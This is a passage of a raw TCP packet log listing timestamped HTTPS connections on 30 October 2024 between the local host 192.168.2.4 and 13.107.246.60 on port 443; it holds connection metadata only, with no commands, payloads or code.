                                                Oct 30, 2024 00:23:27.553908110 CET4435828613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.554033995 CET58286443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.554655075 CET58286443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.554655075 CET58286443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.554666042 CET4435828613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.554672956 CET4435828613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.561191082 CET58291443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.561283112 CET4435829113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.561399937 CET58291443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.561589003 CET58291443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.561621904 CET4435829113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.658595085 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.659714937 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.659728050 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.661226988 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.661233902 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.688308954 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.689227104 CET58288443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.689245939 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.690498114 CET58288443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.690502882 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.796133041 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.796161890 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.796197891 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.796278000 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.796400070 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.796921968 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.796933889 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.796966076 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.796972990 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.803356886 CET58292443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.803378105 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.803466082 CET58292443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.803695917 CET58292443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.803709030 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.823493004 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.823548079 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.823626041 CET58288443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.823899031 CET58288443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.823913097 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.823921919 CET58288443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.823926926 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.828196049 CET58293443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.828222036 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.828299999 CET58293443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.828454971 CET58293443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.828469038 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.017229080 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.018069029 CET58289443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.018151045 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.019402981 CET58289443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.019417048 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.148386955 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.148448944 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.148621082 CET58289443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.149333954 CET58289443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.149382114 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.149413109 CET58289443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.149429083 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.153687954 CET58294443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.153709888 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.153811932 CET58294443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.154025078 CET58294443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.154040098 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.258482933 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.259107113 CET58290443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.259130001 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.259666920 CET58290443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.259671926 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.287884951 CET4435829113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.288961887 CET58291443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.289042950 CET4435829113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.289846897 CET58291443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.289860010 CET4435829113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.402849913 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.403054953 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.403132915 CET58290443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.403234959 CET58290443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.403242111 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.403254986 CET58290443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.403258085 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.407071114 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.407097101 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.407181025 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.407421112 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.407439947 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.416872025 CET4435829113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.416943073 CET4435829113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.417129993 CET58291443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.417129993 CET58291443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.417212009 CET58291443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.417249918 CET4435829113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.419923067 CET58296443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.420003891 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.420104980 CET58296443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.420274973 CET58296443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.420311928 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.582348108 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.582938910 CET58292443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.582957029 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.583561897 CET58292443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.583569050 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.590049028 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.590434074 CET58293443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.590445995 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.590986013 CET58293443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.590991020 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.727720976 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.727821112 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.727883101 CET58293443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.728162050 CET58293443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.728177071 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.728188038 CET58293443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.728192091 CET4435829313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.729908943 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.729978085 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.730029106 CET58292443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.730180025 CET58292443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.730197906 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.730211020 CET58292443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.730216980 CET4435829213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.732244968 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.732322931 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.732431889 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.732594013 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.732625961 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.733040094 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.733086109 CET4435829813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.733163118 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.733349085 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.733378887 CET4435829813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.891031981 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.891619921 CET58294443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.891642094 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:28.892261982 CET58294443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:28.892267942 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.022293091 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.022404909 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.022505999 CET58294443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.022773981 CET58294443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.022789955 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.022814035 CET58294443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.022819996 CET4435829413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.026721001 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.026741028 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.026840925 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.027048111 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.027061939 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.145632982 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.146195889 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.146213055 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.146802902 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.146807909 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.168471098 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.168884993 CET58296443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.168924093 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.169394970 CET58296443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.169410944 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.277481079 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.277600050 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.277632952 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.277652979 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.277709961 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.277879000 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.277889013 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.277906895 CET58295443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.277913094 CET4435829513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.281147003 CET58300443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.281214952 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.281317949 CET58300443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.281532049 CET58300443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.281563997 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.304064989 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.304166079 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.304233074 CET58296443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.304385900 CET58296443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.304385900 CET58296443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.304416895 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.304445028 CET4435829613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.307562113 CET58301443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.307632923 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.307720900 CET58301443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.307873011 CET58301443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.307908058 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.479270935 CET4435829813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.480022907 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.480132103 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.480170012 CET4435829813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.480428934 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.480449915 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.480700016 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.480711937 CET4435829813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.481102943 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.481110096 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.612463951 CET4435829813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.612685919 CET4435829813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.612876892 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.612876892 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.612876892 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.613228083 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.613300085 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.613328934 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.613346100 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.613403082 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.613447905 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.613459110 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.613475084 CET58297443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.613487005 CET4435829713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.616540909 CET58302443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.616568089 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.616656065 CET58302443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.616676092 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.616745949 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.616825104 CET58302443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.616833925 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.616839886 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.617048025 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.617084026 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.755820036 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.756488085 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.756500959 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.757025003 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.757031918 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.885438919 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.885487080 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.885520935 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.885538101 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.885592937 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.885859013 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.885874033 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.885890961 CET58299443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.885896921 CET4435829913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.889594078 CET58304443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.889678001 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.889760017 CET58304443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.890012026 CET58304443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.890047073 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:29.914115906 CET58298443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:29.914145947 CET4435829813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.137170076 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.137340069 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.137950897 CET58300443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.137991905 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.138361931 CET58301443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.138421059 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.139030933 CET58300443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.139046907 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.139731884 CET58301443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.139744997 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.271536112 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.271661997 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.271763086 CET58301443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.272232056 CET58301443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.272278070 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.272308111 CET58301443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.272325039 CET4435830113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.273075104 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.273137093 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.273214102 CET58300443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.273634911 CET58300443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.273660898 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.273694038 CET58300443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.273708105 CET4435830013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.280441999 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.280503988 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.280519009 CET58306443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.280570030 CET4435830613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.280644894 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.280700922 CET58306443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.280875921 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.280879974 CET58306443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.280913115 CET4435830613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.280916929 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.350548983 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.351356030 CET58302443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.351376057 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.351973057 CET58302443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.351983070 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.385850906 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.386545897 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.386607885 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.387820005 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.387841940 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.480415106 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.480488062 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.480564117 CET58302443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.480792046 CET58302443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.480817080 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.480864048 CET58302443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.480876923 CET4435830213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.485821962 CET58307443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.485855103 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.485944986 CET58307443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.486171007 CET58307443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.486196041 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.522980928 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.523010015 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.523041964 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.523180962 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.523181915 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.523396015 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.523439884 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.523471117 CET58303443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.523487091 CET4435830313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.527079105 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.527158976 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.527247906 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.527425051 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.527456045 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.623084068 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.623727083 CET58304443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.623768091 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.625052929 CET58304443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.625065088 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.754374027 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.754533052 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.754606009 CET58304443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.754776955 CET58304443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.754806042 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.754849911 CET58304443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.754862070 CET4435830413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.759788990 CET58309443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.759826899 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:30.759902954 CET58309443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.760119915 CET58309443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:30.760135889 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.015753031 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.016637087 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.016678095 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.018004894 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.018018007 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.020334959 CET4435830613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.020797014 CET58306443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.020843029 CET4435830613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.021925926 CET58306443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.021936893 CET4435830613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.146208048 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.146224976 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.146298885 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.146326065 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.146373034 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.146692991 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.146722078 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.146749973 CET58305443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.146783113 CET4435830513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.150700092 CET58310443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.150784969 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.150904894 CET58310443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.151129007 CET58310443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.151161909 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.152879000 CET4435830613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.153085947 CET4435830613.107.246.60192.168.2.4
